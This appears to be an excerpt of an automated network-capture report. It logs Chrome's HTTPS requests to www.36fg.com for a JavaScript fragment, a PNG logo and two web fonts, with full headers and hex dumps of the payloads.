                                                        2025-03-15 00:17:57 UTC295INData Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 20 20 20 20 20 20 20 09 09 73 63 72 6f 6c 6c 74 6f 70 20 61 63 74 69 76 65 0a 20 20 20 20 20 20 20 20 20 09 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 0a 20 20 20 20 24 28 27 62 6f 64 79 27 29 2e 6d 61 74 65 72 69 61 6c 53 63 72 6f 6c 6c 54 6f 70 28 29 3b 0a 0a 20 20 20 20 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 20 20 20 20 20 20 09 09 57 4f 57 20 61 63 74 69 76 65 0a 20 20 20 20 20 20 20 20 09 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                        Data Ascii: } }); /*---------------------------- scrolltop active ------------------------------*/ $('body').materialScrollTop(); /*---------------------------- WOW active ------------------------------
                                                        2025-03-15 00:17:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.549773104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:57 UTC668OUTGET /static/picture/logo-2.png HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:57 UTC984INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:57 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 2706
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:38 GMT
                                                        etag: "60e7ae7a-a92"
                                                        expires: Sun, 13 Apr 2025 11:46:45 GMT
                                                        Cache-Control: max-age=2592000
                                                        strict-transport-security: max-age=31536000
                                                        accept-ranges: bytes
                                                        Age: 45077
                                                        cf-cache-status: HIT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rf1AG7lWickB61%2B2L5xRhTYRYrGo6Q%2FHFbF435Kza%2FVrOgmk%2FUOMstoNfqaOMohagbQ2FGq8eDHYg9sJF5V8UcO49vAq8pjyv20TEdid91M2TMLRH%2FXCNAF%2BFQlWHsc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4b04b020f45-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1605&rtt_var=610&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1240&delivery_rate=1782661&cwnd=158&unsent_bytes=0&cid=5c6cf3d0dad38c5c&ts=140&x=0"
                                                        2025-03-15 00:17:57 UTC385INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 79 00 00 00 30 08 06 00 00 00 35 ad d5 ed 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 76 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                        Data Ascii: PNGIHDRy05tEXtSoftwareAdobe ImageReadyqe<viTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 6d 6d 2f 22 20 78 6d 6c 6e 73 3a 73 74 52 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 73 54 79 70 65 2f 52 65 73 6f 75 72 63 65 52 65 66 23 22 20 78 6d 6c 6e 73 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 20 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 63 61 61 63 62 34 37 33 2d 62 64 33 35 2d 32 33 34 61 2d 38 38 63 61 2d 31 38 30 34 62 66 33 33 32 31 64 34 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 45 30 44 33 38 31 33 41 46 42 44 46 31 31 45 39 39 34 36 41 45 45 36 41 30 30 41 43 35 36 31 33 22 20
                                                        Data Ascii: obe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:E0D3813AFBDF11E9946AEE6A00AC5613"
                                                        2025-03-15 00:17:57 UTC952INData Raw: 82 fe 77 f2 bc e9 ee 6d 13 f7 91 30 1f fc 94 7f 5a 82 43 75 13 a7 29 a9 ca 54 b0 ec 13 23 84 ef d9 17 f8 2b 92 4b 48 56 cb d6 eb b9 64 7b 2d ed 2c 4b da 6b 33 55 96 35 cb 92 85 3e 05 af 3e dc 4f b2 e2 9c 62 3d 99 80 d6 4c 5c 02 fe a9 b1 e6 09 be 4e fd da c0 a3 e0 24 78 b9 97 15 13 3d 93 21 78 9a c7 d9 93 55 3d ca e0 99 74 5b d6 56 e1 52 b6 96 b2 1c 2b 85 64 b5 5e f2 4b c2 7d 0c 09 56 9b f1 08 a3 be 06 6f 07 ff 16 ae 9d 05 be 01 b6 81 c7 d9 b2 b7 80 5f fa 0d aa 9d 5f aa 93 9f d4 82 83 7b 05 a5 b6 87 5d 19 a4 65 5e 08 67 12 97 25 3c c8 ba ef a9 ca cf 07 90 e7 75 6f b4 24 3f a0 b9 46 27 36 f7 70 38 f5 05 f8 b2 df 2f d6 cc ca a5 0f df 1b 45 79 21 26 34 13 32 51 50 4d 59 7e e2 76 15 e3 9a ee a5 90 1f f3 3c c7 c2 5b 84 6b f4 de d3 36 4e 86 f8 46 33 df 78 a1 9a
                                                        Data Ascii: wm0ZCu)T#+KHVd{-,Kk3U5>>Ob=L\N$x=!xU=t[VR+d^K}Vo__{]e^g%<uo$?F'6p8/Ey!&42QPMY~v<[k6NF3x


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.549776104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:58 UTC677OUTGET /static/fonts/4icv6kvjbnbylgocjc3jsgyn.woff2 HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        Origin: https://www.36fg.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://www.36fg.com/static/css/b6f99a7fe7b04da897d26b4ff96c2310.css
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:58 UTC930INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:58 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 29864
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:32 GMT
                                                        etag: "60e7ae74-74a8"
                                                        strict-transport-security: max-age=31536000
                                                        Cache-Control: max-age=14400
                                                        CF-Cache-Status: REVALIDATED
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Su49EvkNWLgskvt70XWkILbg3iMONBASNOG33MhZu6TxCgmeC4KKOOovE3W8h3YSS3%2FVhrgYexOUujCkzpAbFHRdrXxZqHrVSw7f44QqzGNwB9yg2HDfrB1STvyouDI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4b338a7e226-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2086&min_rtt=2075&rtt_var=800&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1249&delivery_rate=1349353&cwnd=32&unsent_bytes=0&cid=9527e7fc3d6df39d&ts=344&x=0"
                                                        2025-03-15 00:17:58 UTC439INData Raw: 77 4f 46 32 00 01 00 00 00 00 74 a8 00 12 00 00 00 01 13 9c 00 00 74 3f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b f1 24 1c 8e 0a 06 60 16 ad 56 00 81 70 08 84 14 09 8c 23 11 10 0a 82 8c 3c 81 f2 4e 0b 84 18 00 12 bb 48 01 36 02 24 03 88 2c 04 20 05 82 64 07 88 6a 0c 83 39 5b 5d 03 91 02 35 af b3 2f 5b 61 40 6f d6 2b 67 bc 9f d1 43 4e b8 e3 dd 0e a8 f6 76 b4 cf 8a e9 36 4f b9 1d 28 a8 9e 36 95 fd ff ff ff ff d9 c9 44 8e 4c 4e 7b 49 5b 54 01 66 cf 6f 88 e6 c9 73 66 e9 25 0f 69 14 2a af 90 03 61 99 a0 23 6f a3 76 95 b1 e3 14 8c 01 66 9c 64 d0 d4 44 cb 3a 27 59 b7 bd 94 45 b6 5e da 91 4f 97 b6 59 c9 4c 62 4b 32 19 24 b7 ab ad a3 8c 4c 2c fb 45 9e 9a f8 a0 ee 35 2d 48 0d d2 f2 cf 9d 69 32 e0 35 9e 26 b5 03 03 59 14 d6 c1 7e 83
                                                        Data Ascii: wOF2tt?$`Vp#<NH6$, dj9[]5/[a@o+gCNv6O(6DLN{I[Tfosf%i*a#ovfdD:'YE^OYLbK2$L,E5-Hi25&Y~
                                                        2025-03-15 00:17:58 UTC1369INData Raw: dd 0a 49 25 a9 4a 09 10 60 aa 00 59 2e 64 c9 a2 90 71 c1 7b 2d 4b 6e da 4f 2f 52 a0 ea 44 37 69 52 c4 6b f5 d7 44 33 29 3a 44 26 99 99 31 4c 74 e3 49 4c b2 e9 9e 97 be 46 2f 7d 4d 62 04 4f ff fe 55 b7 aa 3e ba 7b 20 46 6b f5 cc 82 11 18 ed 39 64 04 21 95 d3 c9 56 ce 60 65 83 77 ec 9d 5f 3d ab 24 01 46 0c 88 34 b5 e7 bb fb 75 2a 66 aa 1b f1 00 c1 43 b2 e3 76 ef d7 28 b2 c1 9c 7b 08 41 13 30 18 81 f0 80 46 81 70 34 a9 28 5a d4 ca ea 1a b3 03 30 37 27 f4 a8 45 05 0b 60 c0 60 a3 16 c9 60 63 6b 36 72 8c 2a 83 89 62 01 46 63 35 56 60 71 8f 7a ef f9 8d 48 7e 05 2b b1 f0 3f fa fd a6 2c 69 11 ce 23 11 12 b9 db e7 c8 55 7d 99 ee a8 8e 09 1b 4a 1a cb 29 27 39 a0 47 30 b6 46 fb bd d4 55 b5 24 7b f6 aa db 3a c0 20 ba 24 a7 98 5f b0 b5 3e f6 55 f9 ea fd 0c 72 2a a7 5e
                                                        Data Ascii: I%J`Y.dq{-KnO/RD7iRkD3):D&1LtILF/}MbOU>{ Fk9d!V`ew_=$F4u*fCv({A0Fp4(Z07'E```ck6r*bFc5V`qzH~+?,i#U}J)'9G0FU${: $_>Ur*^
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 81 21 39 96 24 40 69 47 89 45 ac 54 e3 85 d5 50 d7 42 91 c2 c4 ea 31 49 96 1d 6b 99 db 19 e3 d4 d9 4f 1d 80 41 1d a0 bd 96 d3 44 4f ef c8 df d7 76 ed 95 47 c8 42 cf de f5 ee 90 15 90 0d fd 7f 6a 15 51 00 7f 0c 19 f7 4f c3 d5 40 72 75 52 ed 0c 37 47 e6 bd 8e 12 0f 19 99 3a e9 af 5c ee 2b 94 0f ab 20 b7 98 08 02 f6 c8 cb c3 ea 6a 9b 31 15 64 79 17 49 94 79 d7 50 7c 69 a3 67 b9 de 8e cc e6 09 51 30 4c a0 e8 44 de 78 4b b4 da b7 f4 b2 e1 12 b7 d6 2f cc 8a 64 45 55 a2 e6 f9 38 08 e7 f0 b1 6b cd d0 80 43 81 63 86 22 d6 23 c0 e6 bb 4a b5 6d 92 cd 1c 16 49 5f 0a 62 13 b9 4b 08 e9 f8 45 19 79 81 d6 bc f7 f9 6e 53 2d 27 fb 03 b2 75 2a e8 5b 44 cb 96 08 52 9c a6 08 aa 93 35 29 28 a6 7f 5f c1 86 fb 44 95 3b 02 43 b5 dd 1e 18 30 b3 64 a7 49 09 9e d4 00 d2 c3 33 ef 34
                                                        Data Ascii: !9$@iGETPB1IkOADOvGBjQO@ruR7G:\+ j1dyIyP|igQ0LDxK/dEU8kCc"#JmI_bKEynS-'u*[DR5)(_D;C0dI34
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 1d 29 83 59 c6 bb 80 29 59 af 09 7b 19 d7 4f 5d 99 aa 4f 2b 1f 69 58 c9 57 5e 65 cb f7 6b 53 16 bd ba 3e ae 85 a6 20 d9 b1 16 13 b9 f7 79 24 6f 3f b2 62 78 f8 3b 84 78 51 75 d7 63 7c c5 ce 31 21 30 f6 f6 30 c2 86 61 2a ca 1b 0e 64 2a 28 3f a8 e3 a4 54 ec b7 ae ac cc 7f 72 b1 4c b7 f6 bb 1e 13 38 de 0f ff ba 3f f9 f9 8b 4a 9c e4 ab 34 8f 37 f4 9a ae 53 d8 8f 3b d6 f1 6e f5 e7 29 be 77 f8 7c 9a 3c be 3e ba 85 8e db 97 a3 63 64 b3 e7 d1 35 55 8b df 70 4d f9 78 fd 12 f6 64 57 ef f7 bc 24 f9 e3 5a e9 90 16 99 82 e1 34 3a 83 45 b0 39 52 05 95 3f 67 ee 13 a7 3f ff 94 be d7 ed fa a6 2b be e5 4d 7b 7e c1 2f b9 6a 6c df 77 7c cf 0d 77 dc f3 23 ef 79 1f 56 23 07 06 45 82 09 70 06 8d 42 a7 32 e8 2c 2e c1 61 73 39 ed 57 df 3c 15 c4 8e 43 4e c0 4e 22 5e 20 39 85 ea 63
                                                        Data Ascii: )Y)Y{O]O+iXW^ekS> y$o?bx;xQuc|1!00a*d*(?TrL8?J47S;n)w|<>cd5UpMxdW$Z4:E9R?g?+M{~/jlw|w#yV#EpB2,.as9W<CNN"^ 9c
                                                        2025-03-15 00:17:58 UTC1369INData Raw: ea f1 36 df 43 c6 d1 f9 70 31 09 99 87 16 93 91 b9 78 41 90 24 15 8a a6 19 66 5a 32 87 2b d4 ea a5 59 6d ad 46 a7 d5 eb 0d 06 a3 71 4e 64 96 b9 b0 58 62 9d 1b 99 69 2f 1c 60 9c 2e 78 b9 57 e8 41 bd 58 7c e7 fe 44 80 a4 28 9a 0e 33 5a 26 83 e3 78 3e 82 28 9c 9b a4 74 59 91 55 45 53 c7 ae a5 19 46 4c cb b4 d9 96 7d 55 1d 76 a7 c3 e5 5a ee 55 f1 b8 bd 9e f9 a5 4c 86 2d 2c 26 22 93 e0 02 81 51 c8 42 af 22 06 85 45 e3 b0 1b 8f 7f 82 80 27 12 48 c4 29 2b 13 29 05 95 d2 1a d1 a9 d3 50 26 30 8b 69 91 f1 ec 82 c3 e6 72 78 5c 3e 4f c0 17 0a 02 07 8c 9e 30 c7 17 13 88 0b 25 22 9a f1 22 b3 92 42 2a 8d 32 24 1b 99 5c 7e 16 96 19 65 a1 52 56 ab 44 33 5b cb b4 ae d0 ab 1b 34 8c 5a cb f4 84 32 53 58 74 ac ba 73 23 93 f6 22 0e a7 a1 cb 68 bc 8d 13 1e 53 af 59 7c f3 27 71
                                                        Data Ascii: 6Cp1xA$fZ2+YmFqNdXbi/`.xWAX|D(3Z&x>(tYUESFL}UvZUL-,&"QB"E'H)+)P&0irx\>O0%""B*2$\~eRVD3[4Z2SXts#"hSY|'q
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 4e 17 e4 cc de da ca cb 7f 24 72 3c 17 4b f7 79 9b 67 9a d9 06 e5 07 eb 79 ed 32 1d 86 91 7b bd 1e 08 9d 4f 0c 67 61 4b 73 0e 73 95 e6 ee 51 10 f2 16 a7 45 3e 39 35 f1 62 c8 46 8f b0 6e 29 32 2a 0e 70 00 29 df 1c 46 51 4b f8 65 3a a5 06 89 bc 61 9a ea 3e 07 39 39 5b 28 91 a3 a4 09 b4 a2 ef b2 e1 75 16 4e ac e5 de 34 3a a1 a8 ed d6 32 96 fd b3 92 a2 fe 1b 33 07 51 11 04 2f a8 cb a6 31 cc bb fc ed bf 01 25 51 a1 89 45 87 20 1b f3 57 78 73 c2 bf 5b 18 c5 ad 4e e4 c1 7f 84 34 fe bb dd 45 7d 96 30 4a b8 40 fb 2c 1b 99 67 e9 6b 09 48 cd 65 80 69 be 69 ea 51 7d dd 70 e0 59 f4 d3 c3 82 ac 32 3e 87 f1 09 9c ad b6 a2 88 7e ba 61 ad ad 6f 71 c3 43 8b 35 d0 68 e2 d4 2d f4 a6 fe 7a 7d 90 1e 16 79 5f a4 58 9a 70 cb 3c 1b c5 29 9a d6 c5 52 fd 78 94 5f 09 30 9f 87 ac ba
                                                        Data Ascii: N$r<Kygy2{OgaKssQE>95bFn)2*p)FQKe:a>99[(uN4:23Q/1%QE Wxs[N4E}0J@,gkHeiiQ}pY2>~aoqC5h-z}y_Xp<)Rx_0
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 2c d0 8e b6 d6 f9 dc 5e 6e 00 9a 1a 5e 0f f5 12 ad 08 13 26 3a bb d7 be 02 d7 8f 56 95 a2 97 34 14 5a 8d 98 84 5b 9d 4b be 3d d7 b6 9c 1d 5d d3 12 93 ae 1b 94 37 dc b5 54 cb 94 bb af c7 8a b4 86 d5 5c d7 40 e4 5b e1 11 4c 3b d8 dc 70 7a 33 ab 2b 2a d7 24 a7 7d 4c 3f d1 a3 4d 95 31 5d cb 05 5a c0 a2 23 9d 62 9e 55 24 fa d4 69 75 c6 4a 88 84 2b 7d 7b ca 24 4d e3 e9 93 be be 64 6e 7e 94 99 0e a5 f9 c7 a2 a0 a3 e1 c4 16 82 36 69 e1 29 61 2a f4 bf f7 c4 2b dd 52 b5 cf c1 dd a5 bd 6d 34 3d d8 03 86 80 40 cd a5 4b bd 8f 2e 2b 35 49 01 38 3b 9b d8 42 b6 3a c7 3a da 06 ae cd 61 1d 3e b0 20 9a 83 3c 84 a7 c0 e9 b3 c9 d3 2f fb 4d 89 06 b2 42 95 2e 84 b5 0a 91 d5 42 ad f4 0a d6 8d dd 93 b1 d5 04 02 62 d3 b4 a9 de 8e ae 9e fe 56 6d 7e 58 53 55 85 76 dd 3a 34 b7 c7 c7
                                                        Data Ascii: ,^n^&:V4Z[K=]7T\@[L;pz3+*$}L?M1]Z#bU$iuJ+}{$Mdn~6i)a*+Rm4=@K.+5I8;B::a> </MB.BbVm~XSUv:4
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 73 f5 f2 d2 e8 62 e7 1a 5a a8 88 98 b9 59 a7 f7 68 f2 ba 91 e7 1d dc 45 2f 02 0a 08 1d 0d 2e b6 37 e8 69 43 86 63 0e 17 b3 ab 66 10 b1 3f 45 6c 1a 10 bb bd b4 88 10 ba 9f 12 a0 f0 65 82 84 28 73 3b d1 31 77 79 a1 12 44 33 0b 8b ec 66 2b 8f ae e0 d1 df d7 ea 04 89 13 13 71 93 e1 da 48 39 f6 07 0c c3 de 7a b8 19 7c b9 9c 10 7f 16 80 a5 13 19 a6 3a 6a 4f 72 77 18 eb 07 9f 1c bf 64 14 0b d3 87 50 51 3a 2c 34 82 41 05 47 68 36 43 57 ad a0 5e 17 c0 68 0e 5e da f1 2f f5 08 67 fa ce c9 6d f3 ac 0d 2a f9 b2 ab cc 47 1c c5 5a 6d 37 29 0e b6 f0 2f 06 3d 28 3d 26 0c a2 45 7b 55 5f 33 83 d9 34 26 3d cc e9 34 be 89 57 bb 82 d7 5c 46 f9 ee 37 1d 6f 77 9c c2 98 f2 c4 55 11 41 8a 0c 2a 32 42 31 82 2c 89 b3 c1 bf 00 f4 5a 77 5d 85 6d f0 67 d1 7f f7 58 c1 ef 4c 18 18 1c ff
                                                        Data Ascii: sbZYhE/.7iCcf?Ele(s;1wyD3f+qH9z|:jOrwdPQ:,4AGh6CW^h^/gm*GZm7)/=(=&E{U_34&=4W\F7owUA*2B1,Zw]mgXL
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 86 06 84 b3 80 aa 2d ef a8 f8 99 cb 8e c3 a5 eb 05 85 e9 36 4a 3e 2a 87 cb c4 98 c4 32 2b 47 32 61 d2 da 39 de d4 d5 35 95 ab 93 8a 00 96 18 3d 30 2d 57 a4 bc 1e 52 b2 3a 58 cf de 2e 5d af 99 93 9e 51 71 c5 1d 64 98 a2 dc 18 7f 24 d8 95 19 da d7 c6 6b 7b 1d f8 54 85 93 ee 44 c8 08 84 80 fb 66 c3 40 ac 2e 89 49 50 2d 33 11 e3 25 79 64 25 32 8b 98 2c b1 54 f4 88 cd 45 e9 31 07 fe e1 41 32 e1 f7 a3 d7 21 38 e7 82 f1 a8 24 6e e6 3d 56 d4 be 3f 66 c2 62 8b 26 9e 88 61 88 e5 32 a8 6a f5 53 82 0f 3f 31 15 08 0a d9 d2 e1 c7 e0 69 7b d7 69 26 ae c1 be ce 42 aa 42 1b 78 4c b4 31 59 de b0 89 4b 5e 78 fe ca 95 db 80 a0 b3 d2 22 a8 86 1b a7 2a 4c c8 dd d7 4b 2a c9 e9 08 c6 64 e4 23 67 26 0c 5e f5 5d 4d 8f 6f 07 17 f8 72 e3 4f e5 d6 23 1e ea 07 0a d9 ad 28 40 c5 4b 0d
                                                        Data Ascii: -6J>*2+G2a95=0-WR:X.]Qqd$k{TDf@.IP-3%yd%2,TE1A2!8$n=V?fb&a2jS?1i{i&BBxL1YK^x"*LK*d#g&^]MorO#(@K
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 08 97 87 2c 57 4a 85 67 ed de 2a cb 70 d9 30 2c 7c 73 73 d1 be de 4d eb b9 41 16 f1 a9 ce 2e 2b 12 d6 11 23 45 70 8d d4 7e a9 09 1f 0c cb e6 a7 f5 36 80 d4 02 03 b8 fc bd 80 c7 fb 25 07 c4 85 1d ee 80 c1 97 cd 5b 48 e4 28 23 ec d1 c5 e5 f6 98 b4 ed 21 06 a9 53 46 c8 1a e1 f5 b7 e3 e5 7a 57 ab 21 83 e6 55 a8 8b e9 e9 d2 1a 70 ea 60 0b 34 46 f7 07 3d d9 c6 48 51 13 bc 16 41 50 2a d5 2b d3 16 b2 a5 ba 2c 0c ba 44 a3 27 a8 b5 0e 53 8e d2 65 26 1e 73 80 4a 53 8c 31 5c 79 09 2b 53 43 f4 26 ef 0e 31 ea 5d 72 7c 7b 7f ec 88 8c 20 93 3a 5d f2 d4 1a b0 34 bd 98 ae 50 d1 bc 19 e9 04 af 44 6d 65 88 19 8b 75 3f 5b a0 a5 82 00 25 ab 5c ae b0 53 f8 35 2d 1d 1d c0 b0 70 67 4e 8e 42 1f ab 89 d1 c4 94 2c e5 9c 4d c4 2a cb 58 59 1a 62 49 41 03 fa e1 c6 12 2c 6e e9 1f 3f 19
                                                        Data Ascii: ,WJg*p0,|ssMA.+#Ep~6%[H(#!SFzW!Up`4F=HQAP*+,D'Se&sJS1\y+SC&1]r|{ :]4PDmeu?[%\S5-pgNB,M*XYbIA,n?


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.549777104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:58 UTC675OUTGET /static/fonts/pxieyp8kv8jhgfvrjjfecg.woff2 HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        Origin: https://www.36fg.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://www.36fg.com/static/css/b6f99a7fe7b04da897d26b4ff96c2310.css
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:58 UTC935INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:58 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 7900
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:34 GMT
                                                        etag: "60e7ae76-1edc"
                                                        strict-transport-security: max-age=31536000
                                                        accept-ranges: bytes
                                                        Cache-Control: max-age=14400
                                                        cf-cache-status: REVALIDATED
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FU5cFEc0I2tdMpAPekzIehBbpjwDZcplQAhhEMCSrjyXnj8ScmWizyVvBaHKW3Xd6ZJZLgERbDsVZJHra%2FhdquQh4uRLGqvVXRbXqaSHY9p5dgKxoYjBc%2F%2F%2BKxnOUbU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4b33ebb3d85-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2386&min_rtt=2340&rtt_var=970&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1247&delivery_rate=1076299&cwnd=69&unsent_bytes=0&cid=24c8feb28c05598f&ts=390&x=0"
